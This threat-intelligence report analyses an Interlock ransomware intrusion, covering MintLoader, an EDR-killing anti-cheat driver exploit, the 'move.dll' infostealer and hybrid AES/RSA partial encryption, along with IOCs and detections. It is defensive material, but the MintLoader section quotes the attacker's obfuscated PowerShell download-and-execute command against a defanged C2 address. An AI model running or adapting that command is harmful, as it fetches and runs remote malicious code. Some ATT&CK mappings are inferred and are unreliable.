Full Report
An in-depth analysis of an Interlock ransomware intrusion, detailing new malware tooling, defense evasion techniques, and high-ROI detection strategies.
Analysis Summary
# Tool/Technique: Interlock Ransomware Core Components
## Overview
The Interlock ransomware group operates a dedicated ransomware operation, developing and operating its own malware rather than utilizing a Ransomware-as-a-Service (RaaS) model. The analysis covers the intrusion lifecycle, including initial access mechanisms, defense evasion tooling, and the final ransomware payload deployment and encryption methods.
## Technical Details
- Type: Malware Family (Ransomware)
- Platform: Primarily Windows (inferred from tooling like PowerShell, DLL execution via `rundll32.exe`)
- Capabilities: Initial access execution, defense evasion (process killing), data exfiltration (via custom infostealer), strong file encryption techniques.
- First Seen: Early stages correlated with a campaign reported in July (year not specified in context, but intrusion analysis details 2025 activity).
## MITRE ATT&CK Mapping
*Note: Mappings are inferred based on described activities.*
- TA0001 - Initial Access
- T1189 - Drive-by Compromise (Potentially via initial loader)
- TA0005 - Defense Evasion
- T1212 - Exploitation for Defense Evasion (Use of anti-cheat driver vulnerability)
- T1055 - Process Injection (Inferred from DLL loading/overwriting)
- TA0008 - Lateral Movement
- T1021 - Remote Services (Inferred by GUI access for deployment)
- TA0010 - Exfiltration
- T1041 - Exfiltration Over C2 Channel (Via custom infostealer)
- TA0011 - Command and Control
- T1071 - Application Layer Protocol (Inferred from initial C2 connection)
## Functionality
### Core Capabilities
- **Initial Execution:** Leverages MintLoader infection resulting in PowerShell execution to fetch and run subsequent stages.
- **File Encryption:** Uses a hybrid encryption scheme: generates a symmetric AES key for file encryption, and then encrypts that AES key using a hardcoded RSA public key (asymmetric encryption).
- **Encryption Speed Optimization:** Implements partial file encryption logic, encrypting a block of data and then skipping a block (with a growing skip amount) to speed up the process on larger files.
### Advanced Features
- **Zero-Day Process Killing:** Utilizes a novel process-killing tool that exploits a zero-day vulnerability in a **gaming anti-cheat driver** specifically to disable EDR and AV tools.
- **Custom Infostealer ('move.dll'):** A dedicated malware capable of collecting sensitive data from popular web browsers. It dynamically loads its real payload by reading and overriding its in-memory code with another DLL.
- **Masquerading/Persistence:** Drops ransomware executables alongside a legitimate copy of `javaw.exe` into folders masquerading as legitimate applications (e.g., 'FortiClient', 'VMware', 'Welcome') within the `%AppData%\Roaming` directory.
## Indicators of Compromise
- File Hashes: [Not provided in context]
- File Names: `move.dll`, `javaw.exe` (dropped legitimate copy), Ransomware executable.
- Registry Keys: [Not provided in context]
- Network Indicators: `138[.]199[.]156[.]22:8080` (Initial C2/payload delivery).
- Behavioral Indicators: PowerShell command initiating remote execution via `iex $(irm ...)` using obfuscated time synchronization calculations for payload retrieval. Custom infostealer execution via `rundll32.exe move.dll start -k key.der -h <remote_host>`.
## Associated Threat Actors
- Interlock Ransomware Group (Operates self-developed malware, non-RaaS model).
- Correlated with indicators reported by eSentire and Mandiant (related to previous Interlock activity/malware like 'Cornflake v3' backdoor).
## Detection Methods
- **Behavioral Detection (Process Killing):** Monitoring for the execution of the custom process-killing tool that leverages the gaming anti-cheat driver vulnerability to terminate security products.
- **Behavioral Detection (Ransomware):** Monitoring for file handle operations that show alternating encryption/skipping patterns on large files, indicating partial encryption logic.
- **Signature-based Detection:** Detection on the initial obfuscated PowerShell command string fetching content from `138[.]199[.]156[.]22:8080`.
## Mitigation Strategies
- Implement multi-layered security, including robust EDR solutions, especially on all endpoints. (The initial victim lacked EDR).
- Thoroughly vet and restrict execution of unsigned scripts via PowerShell logging and Constrained Language Mode enforcement.
- Regularly update security tooling, particularly drivers, to patch vulnerabilities exploited by defense evasion techniques (e.g., gaming anti-cheat drivers).
## Related Tools/Techniques
- MintLoader (Used for initial access/loader).
- Previous Interlock malware artifacts (e.g., Cornflake v3 backdoor, referenced by Mandiant).
***
# Tool/Technique: MintLoader
## Overview
MintLoader is identified as the infection vector leading to initial access in the reported Interlock intrusion. It utilizes PowerShell to securely download and execute the next stage of the attack.
## Technical Details
- Type: Malware Family (Loader/Dropper)
- Platform: Windows
- Capabilities: Initial execution, retrieval and execution of secondary payloads via obfuscated PowerShell commands.
- First Seen: [Not provided in context]
## MITRE ATT&CK Mapping
- TA0001 - Initial Access
- T1566.001 - Phishing: Spearphishing Attachment (Inferred mechanism for delivering initial payload that leads to MintLoader execution).
## Functionality
### Core Capabilities
- **Initial Compromise:** Infects an end user's laptop, initiating the attack chain.
- **PowerShell Staging:** Executes a highly obfuscated PowerShell command to retrieve and execute a secondary payload from a remote server.
### Advanced Features
- **Time-Based Obfuscation:** The PowerShell command uses dynamic calculation based on the difference between the current UTC time and the Unix epoch start time to generate a specific variable, which is then likely used as part of the requested path or session key during payload retrieval from the C2.
## Indicators of Compromise
- File Hashes: [Not provided in context]
- File Names: [Not provided in context]
- Registry Keys: [Not provided in context]
- Network Indicators: `138[.]199[.]156[.]22:8080` (C2 destination for the initial PowerShell script execution).
- Behavioral Indicators: Execution of the specific dynamic PowerShell command: `powershell -w h -c "iex $(irm 138[.]199[.]156[.]22:8080/$($z = [datetime] :: UtcNow; $y = ([datetime]( '01/01/' + '1970')); $x = ($z - $y).TotalSeconds; $w = [math]::Floor($x); $v = $w - ($w % 16); [int64]$v))"`
## Associated Threat Actors
- Used by the Interlock Ransomware Group in this observed intrusion.
## Detection Methods
- **Signature/String Detection:** Detection for the specific, complex PowerShell invocation string shown in the IOCs.
- **Behavioral Detection:** Monitoring for remote execution via PowerShell combined with `irm` (Invoke-RestMethod) to download and execute arbitrary code.
## Mitigation Strategies
- Disable or restrict PowerShell usage for regular users.
- Implement PowerShell logging (Module, Script Block, Transcription logging) to capture the full decoded commands.
- Utilize application control to prevent unauthorized execution flows originating from user-level processes.
## Related Tools/Techniques
- Interlock Ransomware (Downstream payload).
***
# Tool/Technique: Custom Ransomware Encryption Logic
## Overview
The ransomware's file encryption routine utilizes a hybrid approach involving AES (symmetric) for bulk encryption and RSA (asymmetric) to protect the AES key, incorporating a specific optimization technique to speed up the locking process.
## Technical Details
- Type: Technique/Module (Ransomware Encryption Core)
- Platform: Windows
- Capabilities: Secure encryption of targeted files using AES, key protection using RSA, and process optimization via block skipping.
- First Seen: During the final payload deployment phase of the Interlock intrusion.
## MITRE ATT&CK Mapping
- TA0021 - Impact
- T1486 - Data Encrypted for Impact
- T1486.002 - Encrypt File Keys (Specific logic applied to encrypt the symmetric key with the asymmetric key).
## Functionality
### Core Capabilities
- **Symmetric Encryption:** Generates a unique AES key for each file targeted for encryption.
- **Asymmetric Key Protection:** Encrypts the file-specific AES key using a hardcoded RSA public key (encrypt-only mode).
- **Key Appending:** The encrypted AES key is appended to the encrypted file content.
### Advanced Features
- **Partial Encryption/Skip Block:** The `cryptBlocksByAES` function employs a loop that writes an encrypted block of data, then uses `hedle.seek` to jump the file pointer forward, leaving a large chunk of the original file untouched but inaccessible, thereby speeding up encryption for large files. The skip amount (`tsk`) also increases during the process.
## Indicators of Compromise
- File Hashes: [Not provided in context]
- File Names: Encrypted files would likely have a distinct ransom extension applied (not specified).
- Registry Keys: [Not provided in context]
- Network Indicators: [Not applicable]
- Behavioral Indicators: File I/O operations characteristic of writing encrypted data followed by uncharacteristic file pointer jumps (skips) within the same file writing session.
## Associated Threat Actors
- Interlock Ransomware Group
## Detection Methods
- **File Content Analysis:** Scanning for files exhibiting file headers/metadata inconsistent with standard file types following the known encryption block/skip pattern.
- **YARA rules:** Creating rules targeting specific byte sequences associated with the ransomware header or the pattern of the hardcoded RSA key structure within the dropped files.
## Mitigation Strategies
- Robust, regularly tested backup strategy (3-2-1 rule).
- Monitor for rapid, widespread file modification events across network shares or critical servers.
- Deploy Endpoint Detection and Response (EDR) capable of heuristic analysis on file system activity.
## Related Tools/Techniques
- Standard hybrid encryption schemes common among modern ransomware strains.